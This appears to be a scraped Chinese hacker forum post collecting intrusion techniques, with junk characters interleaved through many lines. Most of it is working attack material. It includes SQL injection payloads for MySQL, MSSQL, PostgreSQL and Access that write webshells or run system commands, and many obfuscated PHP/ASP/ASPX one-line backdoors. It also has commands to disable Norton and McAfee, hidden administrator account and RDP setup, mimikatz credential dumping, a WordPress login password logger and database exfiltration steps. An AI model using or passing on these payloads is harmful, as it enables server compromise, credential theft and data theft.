6 T- q7 V3 P5 n$ pinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 F+ _ u; j/ n, e5 c ginsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# D/ B! V; ]2 O3 ?6 `# {select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";8 m# g# {" u4 B g: L! G$ Y1 p
drop table a;
; H& K& o' r6 x# p; ^8 {8 l
- B* y3 [' {$ [英文版本:
1 f; g/ O2 }& c- P. q: c' `: u+ n7 x* z2 w* @
use test;
; O N% k, y- }create table a (cmd text);
, g+ z9 p; w! P& w; p6 ?" i1 Linsert into a values ("set wshshell=createobject (""wscript.shell"") " );
/ l# g; ]: e( }* K! V' Einsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 H1 W6 ~% T- u. |3 @/ J; B1 {insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );& k0 B$ Q/ g ^8 C6 B- z# |
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
, q. @; c( v3 ~0 gdrop table a;- G/ e, v F% E; t! I
$ F6 y/ {, g) s4 Y7 i; w
create table a (cmd BLOB);
. d9 b" t% \1 C8 K4 a' y9 r2 @insert into a values (CONVERT(木马的16进制代码,CHAR));+ ~$ z1 D/ Q/ w) L/ c6 O
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
& j8 F, ~ `1 r$ z% adrop table a;- b/ I* [4 k: m: X _
: X: W# B# ]+ s记录一下怎么处理变态诺顿
+ X4 y4 w0 I, W5 ^+ B7 y/ d查看诺顿服务的路径
' R& e8 d7 k1 f+ F0 ~sc qc ccSetMgr6 t K4 z1 @7 f" X
然后设置权限拒绝访问。做绝一点。。
# a5 \* q# ~8 B/ y( C$ T: w* [( Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system$ Z0 ~: F5 `$ u# A4 z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"( z% r1 o* s. C* @$ c, G4 G) i
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
( f# h; w- \* ~6 E. gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
5 h9 t$ t+ L! C- G6 C% c1 c( p9 {% y/ Z2 X
然后再重启服务器5 J: ~7 E& K2 E/ i& G" ?
iisreset /reboot/ c* S/ O; q# y
这样就搞定了。。不过完事后。记得恢复权限。。。。' _* q4 v0 e# r# L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
& P/ z+ D, C8 o \- A/ @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F D. {1 W6 ~3 L) m! ]
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F5 j) V$ ?; A8 i% R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F1 S( ^. q/ S% H# G0 K
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; n0 u" j& n1 U. P: A( _- m, Z" `$ } x
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 G% o5 s- f2 Z6 i: p5 s) ~# B* D7 T
postgresql注射的一些东西% R: w# {6 T9 t4 F' |- r4 m0 @
如何获得webshell
/ R W- E5 m; q. j2 g! ]7 Jhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); $ q% H6 g# w* P* q* s0 J
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); - ?: U) H. t3 {
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
- B2 T; L$ N2 M/ y$ R- r如何读文件
% a8 t. d# c7 s) zhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
+ P6 t2 k3 h+ P# _5 I5 W' Uhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;! ~' v& C0 M" `3 M) [- n# K
http://127.0.0.1/postgresql.php?id=1;select * from myfile;8 F2 A/ D: \1 ^" [- e/ B4 V( }7 P# j
6 h& [% j6 C" t$ n8 W: kz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。' G) T3 E; F; I5 U. \5 ?
当然,这些的postgresql的数据库版本必须大于8.X
5 f0 q9 m( f% D7 P9 D( w0 v创建一个system的函数:
/ O H+ E2 ^6 k! D2 ACREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT+ y3 ~' ^2 j5 b6 H9 c. f9 C
3 j- {9 k$ u+ b创建一个输出表: F- V2 A' M( w9 ]% M8 `
CREATE TABLE stdout(id serial, system_out text)) ~5 O, v$ n( Q
, J. `' t m8 C5 R r" p) j8 o执行shell,输出到输出表内:
* r; l/ y/ d2 v5 s5 p" ~2 ?3 qSELECT system('uname -a > /tmp/test')5 o# A5 K9 m2 b! G1 M5 p
. C/ D5 s4 e( z( t
copy 输出的内容到表里面;; K) G2 l& `5 p4 ]! u+ Y8 |0 P x. e: n
COPY stdout(system_out) FROM '/tmp/test'5 p7 [2 D9 s) ?( x8 ?4 |! u, L
5 `# s1 f3 N. d, B2 y4 E从输出表内读取执行后的回显,判断是否执行成功0 ~6 W- K- Q* ]: C# E
( T0 A0 W+ E! y( sSELECT system_out FROM stdout
2 _2 {8 U0 f% Q) B下面是测试例子/ L6 H6 c' A3 s# x3 g) |
: k& K, z" r8 S6 h# K! m) Q
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 7 g- z' m' A5 _
& p5 G p0 ~* E2 G, H
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'/ N! {. D$ k! L, d! B& n
STRICT --
$ X C( x1 ]( F& C
5 M/ Z7 b4 L. a4 i/store.php?id=1; SELECT system('uname -a > /tmp/test') --
: D1 x7 I: B/ V/ ?- R2 B- T
" Y: ?( X* \7 D/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
4 ^3 W' e. ?4 X/ [0 M* {& U3 {# D5 @! `
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
# i) V* |* S2 {: }0 o. `net stop sharedaccess stop the default firewall9 ]" V! u8 }- k/ x, A- l4 m
netsh firewall show show/config default firewall- b3 @6 H9 q( K0 a' f+ g
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
9 a* c) C) J7 d7 ?3 wnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
2 b' Z2 s6 Q0 M$ s修改3389端口方法(修改后不易被扫出)
8 m6 N n4 G# w% T" x修改服务器端的端口设置,注册表有2个地方需要修改) m: J" S' f' D% w d# Y
. Z' Q3 H4 R7 ]# d
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
* D: \( P) N. E# H0 y, d iPortNumber值,默认是3389,修改成所希望的端口,比如6000
$ _5 e. m6 e$ r }8 J9 f% J0 f* w6 A0 x+ p7 M+ f$ W
第二个地方:
4 Y" X# T; n0 M! a( w/ e: w[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] % t1 c) z* j+ B9 D* r* Y
PortNumber值,默认是3389,修改成所希望的端口,比如6000, F3 u# Y- T4 u4 y
4 F5 f) Q6 C4 u( _) S1 c6 D现在这样就可以了。重启系统就可以了, p* L& Z, B- }% j
/ o. x( l- |1 `' @) z+ k+ U查看3389远程登录的脚本- I! U% t6 h$ M9 B" @
保存为一个bat文件8 Y; M2 Y# U! R7 ^" c
date /t >>D:\sec\TSlog\ts.log
7 F7 F( t) q; O) `time /t >>D:\sec\TSlog\ts.log
5 D( l" V! x0 H0 D, V* Dnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
. o0 ?7 ?' k4 g+ Z; h; B4 qstart Explorer
8 K( M$ R! L5 x+ U, b) g& j- N1 e" Y' c( x2 O' ?
mstsc的参数:7 r5 o8 J4 Y6 S
$ {1 ]3 J' p4 @0 X# v2 f" g, b$ ~远程桌面连接
& t3 o0 h1 [5 H- d2 z+ n& a9 a9 v7 d$ G; y, ?; Q+ Q
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]' b0 R* G3 V. K/ `2 |! t( X2 R
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
* Y0 r9 |; u- y: k0 }% j3 N( F$ q" [3 O' h. E
<Connection File> -- 指定连接的 .rdp 文件的名称。
3 R/ o- P2 D) \8 ^0 v8 ^( Y1 E) D* t. W' p9 }/ q. [5 U, b( S
/v:<server[:port]> -- 指定要连接到的终端服务器。/ _9 _6 T6 l: n4 w8 n2 e
2 u7 t3 D+ T" |
/console -- 连接到服务器的控制台会话。+ v5 o5 C2 ?' g, L' x, D
2 b$ S; v/ R+ U. Z6 h$ p/f -- 以全屏模式启动客户端。. U# L4 _" N3 _4 H0 v
/ _* h9 [0 O5 t" t# J: m& M. V0 w( |
/w:<width> -- 指定远程桌面屏幕的宽度。: k3 ?$ U6 x6 [8 @
% b* J4 x1 a' e
/h:<height> -- 指定远程桌面屏幕的高度。 l3 g `) g* U7 q3 k* a6 f
; A3 J" m1 J0 D: E4 l; ^2 v$ o
/edit -- 打开指定的 .rdp 文件来编辑。
! }7 T6 o' ~+ O! F) d
9 K/ k) n: n9 S# r" \/migrate -- 将客户端连接管理器创建的旧版( \1 w, i- A$ T4 p" u
连接文件迁移到新的 .rdp 连接文件。
% ?4 g5 Q& V, ]6 M6 c0 K; d N; G' @, z+ S/ w1 F! o1 t6 y2 }6 _: g
) v, Q% c' @& K8 z9 p! a9 K其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
! {$ H! D2 Q- I& amstsc /console /v:124.42.126.xxx 突破终端访问限制数量# ~# L" f1 k5 C' W
0 s3 J: F. ?9 Z% g: O% }. F$ L命令行下开启3389
8 J! [% M' `( s6 ^- [net user asp.net aspnet /add& w% W* J% H8 Y& C6 P
net localgroup Administrators asp.net /add
# v; [6 F2 S9 S ^/ b) W4 @- Q2 Rnet localgroup "Remote Desktop Users" asp.net /add
7 p0 n3 P2 M: |/ w$ b7 _attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D( l& o" q; i0 C5 o3 Y
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0) g) ]6 S: b1 s: Z2 Y
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
" t% A/ _( t$ K" Y6 h: y' Aecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
/ k5 x/ ~7 p; a& j9 |0 u1 ?( r% @sc config rasman start= auto8 ]0 }( W4 h# w/ y5 a' r9 s8 {; {
sc config remoteaccess start= auto
6 ?2 M0 T1 O9 z: j* l! enet start rasman
2 p0 ~0 N, t3 r" Z2 Lnet start remoteaccess
4 v6 B5 R$ g/ pMedia0 o& I+ Z: t9 V# J8 O
<form id="frmUpload" enctype="multipart/form-data"
! f. t/ r7 q& Yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( z& ^: F4 {6 a
<input type="file" name="NewFile" size="50"><br>
6 ~8 y. x* r0 v9 o<input id="btnUpload" type="submit" value="Upload">' y- U9 S; D( e( g% `8 g5 l( M+ W
</form>4 }* G: Q% f# ~) P: T# R" |" L$ z
6 O+ [- |& r2 x3 ]control userpasswords2 查看用户的密码/ w* X+ ^. D7 D# r, Q/ h3 h/ }2 ]
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
* f4 v6 _7 M& l/ f. HSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a4 R9 ~3 G2 I+ B- V" {% m7 T" D
) g+ {' ~9 a8 J2 U( H' L
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
: I$ K( A; R1 j; N测试1: X1 g p/ m* g! N: {7 ^4 x
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- y6 ~ }- U/ d4 G& Q0 H
+ ~8 c3 @" w7 Z6 J5 P) b测试2:
; r' D H2 ]) _; |( {
1 Y) y4 `* o! Z. y) U/ ~create table dirs(paths varchar(100),paths1 varchar(100), id int)' f+ e8 H* D z6 E7 B
; h: R7 Y. o; q/ W
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--7 b2 c+ W: j* n
* |3 w4 e# a z% S( L6 rSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t17 A; y: a0 ]0 E% H! R
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令5 t4 G, K* B6 o7 m' O2 c, a, T
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;2 A; {! j2 U q6 G' E) B
net stop mcafeeframework6 b. u% G6 y+ Z5 q# q- F
net stop mcshield X+ `# {, s) }: O3 D* Y- l' U
net stop mcafeeengineservice) v+ x2 R; \1 Y1 o. h
net stop mctaskmanager
1 m7 `% W7 D1 j# rhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D* ]: `( @+ p- c1 N& g; \
' L% V0 T# H z' `
VNCDump.zip (4.76 KB, 下载次数: 1) # s9 t- `* Y- `' I0 o- H( y
密码在线破解http://tools88.com/safe/vnc.php9 e: M) z/ u$ u* u- ~0 K
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
+ t) W* u' y3 w m! r3 i0 m9 L Z/ C
exec master..xp_cmdshell 'net user'
1 m. Z% h" S, b' A. g7 ~2 b/ c7 emssql执行命令。
- N0 N# z$ B9 J/ ], t/ W9 a0 X获取mssql的密码hash查询
' c; W9 G$ k: k a2 e b% ^select name,password from master.dbo.sysxlogins! d# ^( L, Y% b: f) \- f
9 i' h! T, w. J' C% j7 @
backup log dbName with NO_LOG;& M8 D( P8 b! @
backup log dbName with TRUNCATE_ONLY;
/ h0 R1 H. z$ ?4 ZDBCC SHRINKDATABASE(dbName);
! P; ]% w" b, u0 z+ v4 p9 `mssql数据库压缩 X9 u# h/ D9 ]& h! V2 S: `
1 ]+ A. s$ ?. o
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK- s9 V' v: B W; s
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。& d: d M2 N) l1 J: u
4 X4 h% I: c4 P5 O/ Wbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'3 q/ V* N7 M* W3 ]; s
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
k. t+ T. ?3 ]
u. u3 U5 d/ EDiscuz!nt35渗透要点:* j9 Y1 k6 Z/ @
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default* L1 S* O# C2 H8 |- n8 H
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
/ J( ]; m8 c; q9 n) D* e$ H(3)保存。
" ^8 x6 F$ `; i2 X2 x0 f, G(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
5 w0 S7 |# H( c) Z( Ld:\rar.exe a -r d:\1.rar d:\website\
; G& F. C, [8 w4 L( |递归压缩website
: K( a; K, I0 l$ T注意rar.exe的路径. U+ v) i$ q0 z( B, U" K
6 t$ Q" s0 V9 v3 G5 s
<?php3 H, E5 s) K2 O5 z
# |: P1 i* w2 g% S# ]/ v4 d' f$telok = "0${@eval($_POST[xxoo])}";
0 t" c, }: }% L1 @/ y5 w) Q8 M+ y5 ]
! X: X) w1 k; H, I; Q/ L$username = "123456";
" J# w% i8 G2 K# |. }* C0 s0 |) x- M# E; V0 t2 ]1 n! Y( r. N4 A
$userpwd = "123456";
. l3 {- a2 G3 Z! K8 W; D0 Q Z6 t ?: D7 j
$telhao = "123456";1 m! ]; m! a" T8 N- L4 a3 ~
$ t8 z: I. B+ z6 Y0 F* o1 F$telinfo = "123456";+ Z' o+ ?9 q% t/ K2 l& j2 G
/ O4 I" p% ~* k) z0 [$ A+ W?>
) b0 |* @" R H) }1 xphp一句话未过滤插入一句话木马
, k' g; w. T8 L1 {6 r
O$ {: v3 ] R- }' y站库分离脱裤技巧
- C# |3 h3 s* G0 |exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'% ]5 ^: Z, a' `' ^
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'8 a5 \- h3 z0 G% [
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。: S$ L" p& n! c8 k$ l$ s
这儿利用的是马儿的专家模式(自己写代码)。
+ S& e; y" j2 P" g) Wini_set('display_errors', 1);9 \; r- f5 {9 n$ O0 B( H6 l! b2 P( i
set_time_limit(0);, S2 a+ o. N! W: B# A0 f' M9 n$ H
error_reporting(E_ALL);$ ~+ Y: ?% {) s7 @( b5 v! x' n n
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());3 V3 a! F: j' u' u% D" h p, \
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
5 r+ o- C4 W1 \; Y$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
" J# J6 L5 I# e5 Q+ G. j$i = 0;# `, s: J% M% k9 o& w( m
$tmp = '';
- \2 C1 r8 \/ Z) kwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
1 v6 t5 p8 A0 N; `6 s: [ $i = $i+1;
1 M0 K+ [+ x9 L2 v $tmp .= implode("::", $row)."\n";% A) A" c6 K9 N6 Q0 P2 o
if(!($i%500)){//500条写入一个文件$ O. M& d6 e* W" X; j3 E5 J
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';& N; d; ~. d. X4 P5 [1 v
file_put_contents($filename,$tmp);* N0 C) y1 @7 r
$tmp = '';
& J2 v- l6 Y/ W& T. z! m7 P }" Z# C9 x3 D- j8 C5 g, q& F/ {
}' P- d* I. \( N3 C& d% T h
mysql_free_result($result);
9 M& W' h( T( Q/ l8 G8 F( g+ Z2 `! s; g
! D; z( w3 [3 e0 N
% j, m+ Y+ h+ L//down完后delete
& \5 {) P+ x O6 d
, Z' h. e/ f: X# ]7 R$ ^' K+ ]' s& O* ?- ~% H8 A, w- O/ O
ini_set('display_errors', 1);
# I% Z1 V3 M) f2 E+ oerror_reporting(E_ALL);, f. Y- i5 ?2 ?. b$ `0 u
$i = 0;
6 E! U; }; d( a0 zwhile($i<32) {7 p6 q' K0 m2 [1 W8 X0 @* `- W
$i = $i+1;
$ O6 f; Y" y. S6 v Q $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
# Q$ J3 V9 z1 K4 H7 s! l unlink($filename);! N2 q. b- x$ q; r: f% L: `
} ) y2 ~: U O Z
httprint 收集操作系统指纹5 t9 j# i9 {9 O0 q3 N+ x
扫描192.168.1.100的所有端口2 i( j# {2 F$ ~6 T# G
nmap –PN –sT –sV –p0-65535 192.168.1.1009 k9 F8 J3 D4 G i
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
, c0 G) u. v2 ?5 x6 P' S) ^2 z7 rhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
' X7 z% w8 b5 fNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host1 |& v" i1 y, x$ m) ]
& o2 m- X5 B8 m3 Z+ ?2 hDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)7 n w2 T* T; L) V
& E5 L( c3 d- f+ K0 f( R
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% A: u: t$ P. M1 i+ o
% x" G. f0 q* _& |( ~' @) t- u- Z2 e Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* n) A& V2 H5 c6 ^) }. v* I1 K u% \: v; o2 n+ p8 q. w6 P7 P
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
- n! a ^& k, k6 ?. C, i/ D, _) v
- M/ O2 I6 w/ H0 B- e6 K, K7 b) x http://net-square.com/msnpawn/index.shtml (要求安装)
; Q( [9 ]1 f5 u1 f( f: H; x
, r) i+ o* O N) s7 } tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)* r8 N/ {6 o P7 p
, \3 a5 s5 I* q9 ~9 c SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
( F; L* a5 d( J( q+ ?' y2 Pset names gb23127 V! l5 E9 Y5 C8 C( b
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。1 O! d0 f% a" P) A
1 n: R8 r7 F6 {2 a6 e: o
mysql 密码修改
0 n4 }/ a) f, t! \6 D; zUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” + x9 F+ M& b9 P* F
update user set password=PASSWORD('antian365.com') where user='root';
S# v9 i7 ]6 ]6 {& lflush privileges;+ k4 k4 M! n6 ]1 a6 l% E
高级的PHP一句话木马后门& h; _$ J0 }5 z8 q" `2 l
) j& A0 d% V) U) G, N
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀2 N% ^# w: m8 I- _2 U) R/ @
( j( s8 j' L# U( O n1、5 B" k% }, _, s8 J8 C
0 u) |6 w" D2 H) R1 ~
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";. L' n7 W; Q6 |# S7 b
; o& A* Q" X7 {7 Z+ V+ }: L4 O$hh("/[discuz]/e",$_POST['h'],"Access");
1 s, [- z- n' b! F5 H' k% W6 s2 ?8 O w1 Y' |3 R6 T; y+ F
//菜刀一句话7 |, x) p" t: \- E5 k
5 F0 a; I0 ?6 R; f3 b5 O. V! [
2、) o R3 G3 }6 E* f3 Z% X2 X q
; \4 i5 s; }( t7 @+ V# `" r
$filename=$_GET['xbid'];# [% P, f$ ]0 Q: n8 Q% g# Q- e
; p# a# {0 M2 O7 t, _! jinclude ($filename);
3 {+ i3 O i; G2 G
: T3 H4 N6 y; R$ i$ J//危险的include函数,直接编译任何文件为php格式运行
5 c* ?4 K8 L! _( L. ^& n( \6 d7 T+ G. g* @' ]) x& n
3、
/ h2 q, B& [% W% ]: s% U9 @* q( v9 V& h6 t1 v. r6 T
$reg="c"."o"."p"."y";! ^( A! S# I( j# h$ [+ L9 J
6 S5 }2 @1 f2 }0 b+ }7 V' \" R& _% f$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
+ o" D+ M4 D4 u3 o% e6 i) N" D. I, ]1 m3 \
//重命名任何文件# `* C. y. S' K
- `" W7 I1 {9 y6 T( ?4 g9 F4、 |/ V& w. x, X; |8 S7 J- q: M
! s, q4 j+ G" j, E
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";5 s$ o' p; _3 p9 c/ ~ P% C
2 p8 [; W1 X9 S9 O4 H9 `$gzid("/[discuz]/e",$_POST['h'],"Access");
8 s+ q2 d& x! y1 V
7 g$ b8 J$ x" T6 w2 c! o//菜刀一句话! v. ]. W* r5 ]- |& H6 g) D
2 J X d/ L6 V. s/ d
5、include ($uid);
" i5 }* O% O- B4 p. C0 |) J: k6 h( K* N& M" [7 Q; D
//危险的include函数,直接编译任何文件为php格式运行,POST 8 I) a+ @' P8 Y. ~* s" p. X
3 \( r. E1 g3 _. _# q
' Z8 `% M" P' Y, w% U) _
//gif插一句话
: G1 V) X' s) g9 y7 ~9 \7 w: E% B) I' R/ k# E" _
6、典型一句话# z1 J' E" J2 d
, Y0 t n+ w: G0 S/ q8 L( s+ J- T
程序后门代码
$ I& \- x" v4 _<?php eval_r($_POST[sb])?>
& e* s$ x B, \6 @# y% k, L! }: U程序代码
) }9 ~) P; E# R<?php @eval_r($_POST[sb])?>
$ _+ L' l2 n8 |& w//容错代码% r, ?( L* N: L$ g7 ]8 [
程序代码
9 V7 T n X/ @" _; P& e: i<?php assert($_POST[sb]);?>
+ {6 E9 e! A8 G" X" {6 I: R. E//使用lanker一句话客户端的专家模式执行相关的php语句. V1 ?9 ~7 i, I1 |* | Y
程序代码
7 ^0 u# w! {% W<?$_POST['sa']($_POST['sb']);?>* {) T( C; L3 K2 p: K$ @2 `+ p
程序代码
/ h9 m: v& Z! K; J3 q<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
' v0 E% B8 _% Y! A0 d+ P程序代码3 G& F: F/ Q, ^5 I: O( ~
<?php
, A- C0 o, B6 e@preg_replace("/[email]/e",$_POST['h'],"error");4 L( J+ g7 j$ A$ K
?>
7 n, Z3 |1 ^4 i/ b" x" J) ]//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入! m" z3 S1 H9 m5 I) j
程序代码& A# a! l9 A* j" Q
<O>h=@eval_r($_POST[c]);</O>
& d: U, i/ e. |6 }1 M程序代码1 p6 k; h( }. m' |4 B
<script language="php">@eval_r($_POST[sb])</script>
$ N* g+ ~1 K+ S/ ?$ Z//绕过<?限制的一句话
" d; {8 R' F1 Y: E
) i. L( h: _- y% [3 m- v C4 r9 xhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
+ b, D8 u' |3 D% I: W4 H详细用法:
9 r0 _- E/ R0 N. c1、到tools目录。psexec \\127.0.0.1 cmd
$ N3 B+ k% c2 y' ]2、执行mimikatz. g2 E7 l) t7 I: K% R7 b
3、执行 privilege::debug
$ U5 N, F* V/ D4 T% L4、执行 inject::process lsass.exe sekurlsa.dll
/ r5 U: q: l* h6 j- e: w; ]5、执行@getLogonPasswords
+ y* P2 D6 Q6 G6、widget就是密码
7 j$ o0 L0 k9 y* s) q% V! `' \6 S% C/ T7、exit退出,不要直接关闭否则系统会崩溃。2 t3 s8 S* i/ X* L/ f6 q
) C6 I% J0 s+ n$ }: P1 e$ i( Shttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
. g9 _7 |5 k6 } G V8 m: a( x% v( [/ g7 J
自动查找系统高危补丁7 X/ Z: a7 M# v4 ?/ i7 U
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt2 x! r6 O" s/ e
* K8 ?9 w* t8 D5 J5 n( _$ n. \( d
突破安全狗的一句话aspx后门# Z* \5 G6 n. l3 i$ @2 E: V* O& W
<%@ Page Language="C#" ValidateRequest="false" %>7 \3 n9 y% n5 u m9 P! ` t, K
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
. ^3 N: J: b8 ]. J; J+ t9 Awebshell下记录WordPress登陆密码
+ _1 B& B- f8 ^4 P0 I1 L# m& wwebshell下记录Wordpress登陆密码方便进一步社工4 o; ?, L& B* f6 s1 i
在文件wp-login.php中539行处添加:
* F$ {& x" a. y9 _/ Y. d0 h c5 v. Z// log password
, g* @4 j) N$ ]! C* D% F' A# O z6 a$log_user=$_POST['log'];
$ M+ p' d% n& _" n" r: c$log_pwd=$_POST['pwd'];
1 h- y v+ e4 H4 }- a$log_ip=$_SERVER["REMOTE_ADDR"];. K( X( a0 H3 J
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;% S; I6 w! {7 G+ j0 b1 O
$txt=$txt.”\r\n”;: `$ R3 W/ n3 [4 h; S
if($log_user&&$log_pwd&&$log_ip){ ?, A; y3 ^5 M/ V
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
- C* M% @% w9 k7 `4 E H}8 Z6 s( m9 y( j V0 ]
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。+ ]/ H5 o: c9 |% V4 v
就是搜索case ‘login’' m, g3 h$ O! c
在它下面直接插入即可,记录的密码生成在pwd.txt中,4 J6 d3 Y4 b C! m. E
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
9 q; g8 \4 G, c# s) q7 E& Q利用II6文件解析漏洞绕过安全狗代码:
( ^2 Q! k. }# P, c+ S0 y5 w J;antian365.asp;antian365.jpg+ U. I3 F& x/ a7 h _
7 N- H1 I* N- v
